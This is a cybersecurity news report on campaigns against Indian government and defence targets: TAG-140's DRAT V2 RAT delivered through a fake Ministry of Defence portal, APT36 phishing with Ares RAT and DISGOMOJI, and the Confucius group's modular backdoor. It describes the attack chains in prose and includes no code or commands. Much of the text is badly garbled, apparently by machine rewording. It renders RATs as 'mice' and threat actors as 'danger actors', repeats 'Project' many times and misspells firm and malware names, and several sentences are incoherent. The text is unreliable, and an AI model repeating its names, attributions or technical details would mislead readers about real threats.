A hacking group, along with other relations other than Pakistan, has been found targeting the Indian government’s organizations with a revised version of a remote access trojan (RAT), called DRAT.
Activity recorded by the Future INSIKT group has been held responsible for tracking a danger actor as tag -140, stating that overlaps with cidcopy, an unfavorable collective transparent tribe (aka APT -C -56, APT36, Donbag, Earth Current Lopd, Project, Project, Project, Project, Project, Project, Project, Project, Projects. Being a sub-cluster has been evaluated.
“Tag -140 has consistently demonstrated recurrence and diversity in its malware arsenal and delivery techniques,” the mastercard -owned company said in an analysis published last month.
“This is the latest campaign, which disturbed the Indian Ministry of Defense through a clone press release portal, symbolizes a minor but remarkable change in both malware architecture and command-end-control (C2) functionality.”
The updated version of a draat called Drat V2 is the latest addition to Sidecopy’s arsenal arsenal, including other equipment such as Action Rat, Allcor Rat, Ares Rat, Curlback Rat, Reverse, Spark Rat and Zeno Rat, which infect Windows and Links systems.
The activity of the attack displays the playbook that develops adverseness, which highlights the rat’s ability to refine and diversify the “interchangeable suit” of the rat, to complicate efforts to harvest, detect and monitor sensitive data.
The attacks orchestrated by the danger actor have focused their targeted focus from the government, defense, maritime and educational areas to include organizations affiliated to the country’s railway, oil and gas, and foreign ministries in the country. The group is considered active from at least 2019.
The transition sequence documented by the recorded future takes advantage of the approach to a clickfix-style that spoils the official press release portal of the Indian Ministry of Defense to quit the DRAT’s .NET-based version in a new delighty-convenient version.
The fake website has an active link, which when clicked, a transition sequence begins that copies a malicious command on the clipboard of the machine and urges the victim to paste and execute it by launching the command shell.
This is an external server (“Trade4Wealth[.]”) In, which is then executed via mshta.exe, to launch a loader called broaderspect. The loader is responsible for downloading and launching a decoy PDF, establishing firmness through Windows Registry Changes, and downloading Drat V2 from the same server.
Drat V2 arbitrarily adds a new command to the shell command execution, which improves the flexibility of subsequent exploitation. It also attracts attention to its C2 IP address using Base64-encoding and updates the TCP protocol launched by its custom server to support the command input in both ASCII and Unicode. However, the server reacts only to ASCII. The original drat requires unicode for both input and output.
“Compared to its predecessor, the Drat V2 reduces string operations by placing the header in the planetxt, probably prioritizing parsing reliability on secret,” it is said in the future. “Drat V2 lacks advanced anti-analysis techniques and depends on the methods of basic infection and firmness, allowing it to detect through static and behavior analysis.”
Other known abilities allow it to perform a variety of actions on compromised hosts, including operating the reconnaissance, uploading additional payloads and exfiltrate data.
“These tasks offer tag -140 with frequent, flexible control on the infected system and allow for both automated and interactive post -exploitation activity without the need for the deployment of auxiliary malware tool,” the company said.
“Drat V2 appears to be another modular addition rather than a certain growth, strengthening the possibility that tag -140 will rotate mice in campaigns and rotate mice to sign and maintain operational flexibility.”
APT36 Campaign Aresi rats and disgust dysgomoji
During the Indo-Pakistan struggle in May 2025, with capitalization to distribute Arace rats in attacks that targeted state-a-Pakistan danger from Pakistan and coordinated hecticist operations, APT36, as well as defense, government, IT, healthcare, education and telecom areas.
Secreed Labs noted back in May 2025, “With the deployment of equipment such as Ares Rats, the attackers achieved a complete remote access to infected systems – monitoring, opening the door for potential sabotage of data theft and important services,” Sacrite Labs noted in May 2025.
Recently, APT36 campaign has been found to spread careful fishing emails with malicious PDF attachments to target Indian defense personnel.
Messages present the purchase orders from the National Informatics Center (NIC) and persuade the recipients to click on the embedded button within the PDF documents. By doing this, there is an executable download that misleads a PDF icon and Windows users appoint double extensions format (ie, *.PDF.EXE) to look valid.
In addition to sidstep analysis of binary, anti-debag and anti-VM features, an next-step payload in memory is designed to launch, which can calculate files, can log in log kestrokes, capture clipboard materials, get browser crackers, and c2 for a random Can contact the server.
“APT36 reflects an important and ongoing cyber threat to national security, especially the Indian defense targets infrastructure,” Sifirma said. “Advanced phishing strategy and the use of a group of credential theft reflects the sophistication of modern cyber espionage.”
Another expedition by the 360 Threat Intelligence Center has taken advantage of a new version of Go-based malware referred to as dysgomoji as part of the booby-trapped zip files distributed through fishing attacks. The Beijing-based cyber security company stated that Malware said, “is an ELF executable program written in Golding and uses Google Cloud for C2, which marks the shift from the discord.
“In addition, the browser theft plug-in and remote management tools will be downloaded to get further theft operations and remote control,” it said. “The task of downloading the dysgomoji variant is similar to the previously found load, but the previous disgomoji used the discord server, while this time it used the Google Cloud Service for communication.”
Confucius left VuptersTeler and Anondoor
The conclusion comes as a cyber detective actor, known as Confucius, is associated with a new campaign, a information that is stolen and a pre -specified modular backdoor headrur.
Confucius assessment is a danger group working with the objectives that align with India. It is believed that it has been active since at least 2013, targeting government and military units in South Asia and East Asia.
According to Seebug’s Goysec 404 team, Multi-Stage Attack, DLL employs the Windows shortcut (LNK) files as a starting point to distribute Anondoor using DLL side-loading techniques, after which the system is collected and the supplieor is received from a remote server.
The backdor is fully acclaimed, to release the command to an attacker, execute the command, carrying screenshots, download files, dump passwords from Chrome browser, as well as enabling list files and folders.
“It has evolved from a pre -exposed single detective Trojan of a modular back door download and executing, performing the relatively high capacity of technical recurrence,” said the 404 team. “Its backdoor component has been enacted in the C# DLL file and detected sandbox by loading the method specified via Invoche.”
